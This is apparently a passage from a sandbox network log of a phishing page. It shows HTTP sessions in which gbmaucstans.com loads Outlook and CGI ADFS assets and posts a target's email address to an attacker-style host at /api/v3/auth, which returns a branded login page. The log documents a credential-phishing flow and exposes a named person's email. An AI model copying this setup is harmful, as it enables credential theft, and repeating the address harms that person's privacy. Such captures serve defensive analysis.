                                                      2024-04-16 11:56:58 UTC1369INData Raw: 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79
                                                      Data Ascii: tPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=ty
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74
                                                      Data Ascii: )},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return t
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30
                                                      Data Ascii: =t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 21 7e 5d 3f 3d 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e
                                                      Data Ascii: !~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+|((?:^|[^
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 72 69 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e
                                                      Data Ascii: ring(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 76 61 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f
                                                      Data Ascii: var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.remo
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 61 72 20 74 2c 6e 2c 72 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 70 3b 72 65 74 75 72 6e 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70
                                                      Data Ascii: ar t,n,r=e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scop
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 69 6c 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61
                                                      Data Ascii: ile(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){va
                                                      2024-04-16 11:56:58 UTC1369INData Raw: 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e
                                                      Data Ascii: ateElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.54974852.96.165.504435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:59 UTC592OUTGET /mail/favicon.ico HTTP/1.1
                                                      Host: outlook.office.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:59 UTC1049INHTTP/1.1 200 OK
                                                      Content-Length: 7886
                                                      Content-Type: image/x-icon
                                                      Last-Modified: Mon, 15 Apr 2024 16:41:28 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "1da8f53c326b2ce"
                                                      Server: Microsoft-IIS/10.0
                                                      request-id: b0f8c2cc-3c35-f535-4d91-fd5a7e07784e
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                      X-PreferredRoutingKeyDiagnostics: 0
                                                      X-CalculatedFETarget: DM6PR03CU002.internal.outlook.com
                                                      X-BackEndHttpStatus: 200
                                                      X-CalculatedBETarget: DM8PR03MB6245.NAMPRD03.PROD.OUTLOOK.COM
                                                      X-BackEndHttpStatus: 200
                                                      x-besku: UNKNOWN
                                                      X-RUM-Validated: 1
                                                      X-RUM-NotUpdateQueriedPath: 1
                                                      X-RUM-NotUpdateQueriedDbCopy: 1
                                                      X-Proxy-RoutingCorrectness: 1
                                                      X-Proxy-BackendServerStatus: 200
                                                      X-BEPartition: Clique/CLNAMPRD03DSM01
                                                      X-FEProxyInfo: BN9PR03CA0299.NAMPRD03.PROD.OUTLOOK.COM
                                                      X-FEEFZInfo: LYH
                                                      MS-CV: zML4sDU8NfVNkf1afgd4Tg.1.1
                                                      X-FEServer: DM6PR03CA0042
                                                      X-FirstHopCafeEFZ: LYH
                                                      X-Powered-By: ASP.NET
                                                      X-FEServer: BN9PR03CA0299
                                                      Date: Tue, 16 Apr 2024 11:56:59 GMT
                                                      Connection: close
                                                      2024-04-16 11:56:59 UTC7886INData Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: 6 hf( @


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.54974952.96.122.24435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:00 UTC358OUTGET /mail/favicon.ico HTTP/1.1
                                                      Host: outlook.office.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:00 UTC1049INHTTP/1.1 200 OK
                                                      Content-Length: 7886
                                                      Content-Type: image/x-icon
                                                      Last-Modified: Mon, 15 Apr 2024 16:41:28 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "1da8f53c326b2ce"
                                                      Server: Microsoft-IIS/10.0
                                                      request-id: 086fadcd-e788-fee2-dcff-588e6ee554c1
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                      X-PreferredRoutingKeyDiagnostics: 0
                                                      X-CalculatedFETarget: CYZPR20CU001.internal.outlook.com
                                                      X-BackEndHttpStatus: 200
                                                      X-CalculatedBETarget: CYYPR04MB8840.NAMPRD04.PROD.OUTLOOK.COM
                                                      X-BackEndHttpStatus: 200
                                                      x-besku: UNKNOWN
                                                      X-RUM-Validated: 1
                                                      X-RUM-NotUpdateQueriedPath: 1
                                                      X-RUM-NotUpdateQueriedDbCopy: 1
                                                      X-Proxy-RoutingCorrectness: 1
                                                      X-Proxy-BackendServerStatus: 200
                                                      X-BEPartition: Clique/CLNAMPRD04CYS02
                                                      X-FEProxyInfo: BN0PR04CA0040.NAMPRD04.PROD.OUTLOOK.COM
                                                      X-FEEFZInfo: LYH
                                                      MS-CV: za1vCIjn4v7c/1iObuVUwQ.1.1
                                                      X-FEServer: CYZPR20CA0010
                                                      X-FirstHopCafeEFZ: LYH
                                                      X-Powered-By: ASP.NET
                                                      X-FEServer: BN0PR04CA0040
                                                      Date: Tue, 16 Apr 2024 11:57:00 GMT
                                                      Connection: close
                                                      2024-04-16 11:57:00 UTC7886INData Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: 6 hf( @


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.549750185.216.70.44435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:02 UTC525OUTOPTIONS /api/v3/auth HTTP/1.1
                                                      Host: bc1qhefefhkqg4a9rhm372pr0wj.com
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      Origin: http://gbmaucstans.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Dest: empty
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:02 UTC408INHTTP/1.1 200 OK
                                                      date: Tue, 16 Apr 2024 11:57:01 GMT
                                                      server: uvicorn
                                                      vary: Origin
                                                      access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
                                                      access-control-max-age: 600
                                                      access-control-allow-credentials: true
                                                      access-control-allow-origin: http://gbmaucstans.com
                                                      access-control-allow-headers: content-type
                                                      content-length: 2
                                                      content-type: text/plain; charset=utf-8
                                                      Connection: close
                                                      2024-04-16 11:57:04 UTC2INData Raw: 4f 4b
                                                      Data Ascii: OK


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.549751185.216.70.44435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:03 UTC665OUTPOST /api/v3/auth HTTP/1.1
                                                      Host: bc1qhefefhkqg4a9rhm372pr0wj.com
                                                      Connection: keep-alive
                                                      Content-Length: 178
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Accept: application/json, text/javascript, */*; q=0.01
                                                      Content-Type: application/json
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Origin: http://gbmaucstans.com
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:03 UTC178OUTData Raw: 7b 22 75 75 69 64 22 3a 22 36 66 61 66 64 30 39 33 2d 64 37 37 31 2d 34 39 38 37 2d 61 37 36 30 2d 32 35 65 35 62 33 31 62 34 34 66 38 22 2c 22 69 64 65 6e 74 69 66 69 65 72 22 3a 22 66 31 30 37 34 65 30 30 2d 34 32 33 39 2d 34 33 35 61 2d 38 32 38 39 2d 30 30 61 61 38 33 38 30 30 64 36 66 22 2c 22 73 65 72 76 65 72 22 3a 22 62 63 31 71 68 65 66 65 66 68 6b 71 67 34 61 39 72 68 6d 33 37 32 70 72 30 77 6a 2e 63 6f 6d 22 2c 22 75 73 65 72 22 3a 22 66 72 61 6e 63 6f 69 73 2e 62 6f 75 6c 61 6e 67 65 72 40 63 67 69 2e 63 6f 6d 22 7d
                                                      Data Ascii: {"uuid":"6fafd093-d771-4987-a760-25e5b31b44f8","identifier":"f1074e00-4239-435a-8289-00aa83800d6f","server":"bc1qhefefhkqg4a9rhm372pr0wj.com","user":"francois.boulanger@cgi.com"}
                                                      2024-04-16 11:57:12 UTC218INHTTP/1.1 200 OK
                                                      date: Tue, 16 Apr 2024 11:57:03 GMT
                                                      server: uvicorn
                                                      content-length: 7928
                                                      content-type: application/json
                                                      access-control-allow-origin: *
                                                      access-control-allow-credentials: true
                                                      Connection: close
                                                      2024-04-16 11:57:12 UTC7928INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 3c 68 74 6d 6c 20 6c 61 6e 67 3d 5c 22 65 6e 2d 55 53 5c 22 3e 5c 6e 3c 68 65 61 64 3e 5c 6e 5c 74 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 5c 22 20 63 6f 6e 74 65 6e 74 3d 5c 22 49 45 3d 31 30 2e 30 30 30 5c 22 3e 5c 6e 5c 74 3c 6d 65 74 61 20 6e 61 6d 65 3d 5c 22 76 69 65 77 70 6f 72 74 5c 22 20 63 6f 6e 74 65 6e 74 3d 5c 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 5c 22 3e 5c 6e 5c 74 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 63 6f 6e 74 65 6e 74 2d 74 79
                                                      Data Ascii: {"status":"success","type":"Organization","message":"<html lang=\"en-US\">\n<head>\n\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=10.000\">\n\t<meta name=\"viewport\" content=\"initial-scale=1.0, maximum-scale=1.0\">\n\t<meta http-equiv=\"content-ty


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.549752185.216.70.44435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:13 UTC366OUTGET /api/v3/auth HTTP/1.1
                                                      Host: bc1qhefefhkqg4a9rhm372pr0wj.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:14 UTC173INHTTP/1.1 405 Method Not Allowed
                                                      date: Tue, 16 Apr 2024 11:57:13 GMT
                                                      server: uvicorn
                                                      allow: POST
                                                      content-length: 31
                                                      content-type: application/json
                                                      Connection: close
                                                      2024-04-16 11:57:14 UTC31INData Raw: 7b 22 64 65 74 61 69 6c 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d
                                                      Data Ascii: {"detail":"Method Not Allowed"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.54975485.119.134.1684435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:57:14 UTC555OUTGET /adfs/portal/css/style.css HTTP/1.1
                                                      Host: federation.cgi.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: text/css,*/*;q=0.1
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: style
                                                      Referer: http://gbmaucstans.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:57:14 UTC286INHTTP/1.1 200 OK
                                                      Content-Length: 7830
                                                      Content-Type: text/css
                                                      Expires: Thu, 16 May 2024 11:57:14 GMT
                                                      ETag: E7265AE732FAB707944B19C7CA739854BC95F6518C09768DB0EFA1D412872EB4
                                                      Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                      Date: Tue, 16 Apr 2024 11:57:07 GMT
                                                      Connection: close
